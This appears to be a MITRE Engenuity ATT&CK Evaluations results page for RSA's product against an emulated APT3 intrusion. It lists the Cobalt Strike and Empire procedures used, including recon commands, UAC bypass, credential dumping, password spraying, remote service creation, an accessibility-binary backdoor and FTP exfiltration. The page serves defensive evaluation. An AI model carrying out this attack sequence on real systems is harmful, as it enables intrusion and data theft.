The 2022 ATT&CK Evaluations for Managed Services Call for Participation is now open. Click here to learn how to participate.
Home  >  Enterprise  >  Participants  >  RSA  >  Results
RSA: Results
Participant Configuration:  APT3

MITRE Engenuity does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.
 

Procedure

Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

[1]

Procedure

Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32

[1]

Procedure

Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)

[1]

Procedure

Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

[1]

Procedure

Cobalt Strike: C2 channel established using port 53

Procedure

Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com

Procedure

Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding

Procedure

Cobalt Strike: 'ipconfig -all' via cmd

[1]

Procedure

Cobalt Strike: 'arp -a' via cmd

[1]

Procedure

Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

[1]

Procedure

Cobalt Strike: 'ps' (Process status) via Win32 APIs

Procedure

Cobalt Strike: 'tasklist -v' via cmd

[1]

[2]

Procedure

Cobalt Strike: 'sc query' via cmd

[1]

Procedure

Cobalt Strike: 'net start' via cmd

[1]

Procedure

Cobalt Strike: 'systeminfo' via cmd

[1]

Procedure

Cobalt Strike: 'net config workstation' via cmd

[1]

Procedure

Cobalt Strike: 'net localgroup administrators' via cmd

[1]

Procedure

Cobalt Strike: 'net localgroup administrators -domain' via cmd

[1]

Procedure

Cobalt Strike: 'net group \"Domain Admins\" -domain' via cmd

[1]

[2]

Procedure

Cobalt Strike: 'net group \"Domain Admins\" -domain' via cmd

[1]

[2]

Procedure

Cobalt Strike: 'net user -domain' via cmd

[1]

Procedure

Cobalt Strike: 'net user george -domain' via cmd

[1]

Procedure

Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

[1]

Procedure

Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

[1]

Procedure

Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token

Procedure

Cobalt Strike: 'ps' (Process status) via Win32 APIs

Procedure

Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

[1]

Procedure

Cobalt Strike: 'net group \"Domain Controllers\" -domain' via cmd

[1]

Procedure

Cobalt Strike: 'net group \"Domain Computers\" -domain' via cmd

[1]

Procedure

Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

[1]

Procedure

Cobalt Strike: 'netstat -ano' via cmd

[1]

Procedure

Cobalt Strike: Built-in Mimikatz credential dump capability executed

Procedure

Cobalt Strike: Credential dump capability involved process injection into lsass

Procedure

Cobalt Strike: Built-in hash dump capability executed

Procedure

Cobalt Strike: Hash dump capability involved process injection into lsass.exe

Procedure

Cobalt Strike: Built-in token theft capability executed to change user context to George

Procedure

Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

[1]

Procedure

Cobalt Strike: C2 channel modified to use port 80

[1]

Procedure

Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com

Procedure

Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS

Procedure

Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

[1]

Procedure

Added user Jesse to Conficker (10.0.0.5) through RDP connection

Procedure

Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection

Procedure

Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information

Procedure

Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

[1]

Procedure

Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

[1]

Procedure

Cobalt Strike: 'dir -s -b \"\\conficker\wormshare\"' via cmd

[1]

Procedure

Cobalt Strike: 'tree \"C:\Users\debbie\"' via cmd

[1]

Procedure

Cobalt Strike: 'ps' (Process status) via Win32 APIs

Procedure

Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

[1]

[2]

Procedure

Cobalt Strike: Keylogging capability included residual enumeration of application windows

Procedure

Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

[1]

Procedure

Cobalt Strike: Screen capture capability involved process injection into explorer.exe

[1]

Procedure

Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure

Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure

Cobalt Strike: Download capability exfiltrated data through existing C2 channel

Procedure

Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

[1]

Procedure

Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

[1]

Procedure

RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

[1]

[2]

Procedure

RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism

Procedure

Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

Footnotes

  • Vendor says launch command-line argument truncation resulted in PowerShell not being able to be decoded.
[1]

Procedure

Empire: C2 channel established using port 443

[1]

Procedure

Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com

[1]

Procedure

Empire: Encrypted C2 channel established using HTTPS

[1]

Procedure

Empire: 'route print' via PowerShell

[1]

Procedure

Empire: 'ipconfig -all' via PowerShell

[1]

Procedure

Empire: 'whoami -all -fo list' via PowerShell

[1]

Procedure

Empire: 'qprocess *' via PowerShell

[1]

Procedure

Empire: 'net start' via PowerShell

[1]

Procedure

Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

[1]

Procedure

Empire: WinEnum module included enumeration of user information

Procedure

Empire: WinEnum module included enumeration of AD group memberships

Procedure

Empire: WinEnum module included enumeration of password policy information

Procedure

Empire: WinEnum module included enumeration of recently opened files

Procedure

Empire: WinEnum module included enumeration of interesting files

Procedure

Empire: WinEnum module included enumeration of clipboard contents

Procedure

Empire: WinEnum module included enumeration of system information

Procedure

Empire: WinEnum module included enumeration of Windows update information

Procedure

Empire: WinEnum module included enumeration of system information via a Registry query

Procedure

Empire: WinEnum module included enumeration of services

Procedure

Empire: WinEnum module included enumeration of available shares

Procedure

Empire: WinEnum module included enumeration of mapped network drives

Procedure

Empire: WinEnum module included enumeration of AV solutions

Procedure

Empire: WinEnum module included enumeration of firewall rules

Procedure

Empire: WinEnum module included enumeration of network adapters

Procedure

Empire: WinEnum module included enumeration of established network connections

[1]

Procedure

Empire: 'net group \"Domain Admins\" -domain' via PowerShell

[1]

Procedure

Empire: 'Net Localgroup Administrators' via PowerShell

[1]

Procedure

Empire: 'net user' via PowerShell

[1]

Procedure

Empire: 'net user -domain' via PowerShell

[1]

Procedure

Empire: 'net group \"Domain Computers\" -domain' via PowerShell

[1]

Procedure

Empire: 'net use' via PowerShell

[1]

Procedure

Empire: 'netstat -ano' via PowerShell

Procedure

Empire:'reg query' via PowerShell to enumerate a specific Registry key

[1]

Procedure

Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level

Procedure

Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk

[1]

Procedure

Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP

[1]

Procedure

Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080

[1]

[2]

Procedure

Empire: Built-in keylogging module executed to capture keystrokes of user Bob

Procedure

Empire: Built-in keylogging module included residual enumeration of application windows

Procedure

Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure

Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of usersKmitnick, Bob, and Frieda

[1]

Procedure

Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)

[1]

Procedure

Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

[1]

Procedure

Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)

[1]

Procedure

Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying

[1]

Procedure

Empire: 'net use -delete' via PowerShell

[1]

Procedure

Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

[1]

Procedure

Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick

[1]

Procedure

Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

[1]

Procedure

Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

[1]

Procedure

Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

Procedure

Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

[1]

Procedure

Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

[1]

Procedure

Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)

[1]

Procedure

Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

[1]

Procedure

Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

Procedure

Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

[1]

[2]

Procedure

Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

[1]

Procedure

Empire: 'reg query' via PowerShell to enumerate a specific Registry key

[1]

Procedure

Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

[1]

Procedure

Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

[1]

Procedure

Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

[1]

[2]

Procedure

Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure

Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Procedure

Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Procedure

Empire: File dropped to disk is a renamed copy of the WinRAR binary

Footnotes

  • Telemetry later identified recycler.exe as WinRAR during execution, no detections identified it as WinRAR upon file copy.

Procedure

Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)

[1]

Procedure

Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

Footnotes

  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.

Procedure

Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file

Footnotes

  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.

Procedure

Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary

Footnotes

  • Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed.
  • Vendor stated file hash is also available that could be used with sources like Virustotal to identify the binary. YARA is also supported and rules could be created to identify WinRAR.
[1]

Procedure

Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

Procedure

Empire: 'del C:\\"$\"Recycle.bin\old.rar'

Footnotes

  • The master file table on 10.0.1.5 (CodeRed) was inspected through the capability to look for deleted files, showing old.rar.
[1]

Procedure

Empire: 'del recycler.exe'

Procedure

magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

[1]

Procedure

RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism

Procedure

Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)

[1]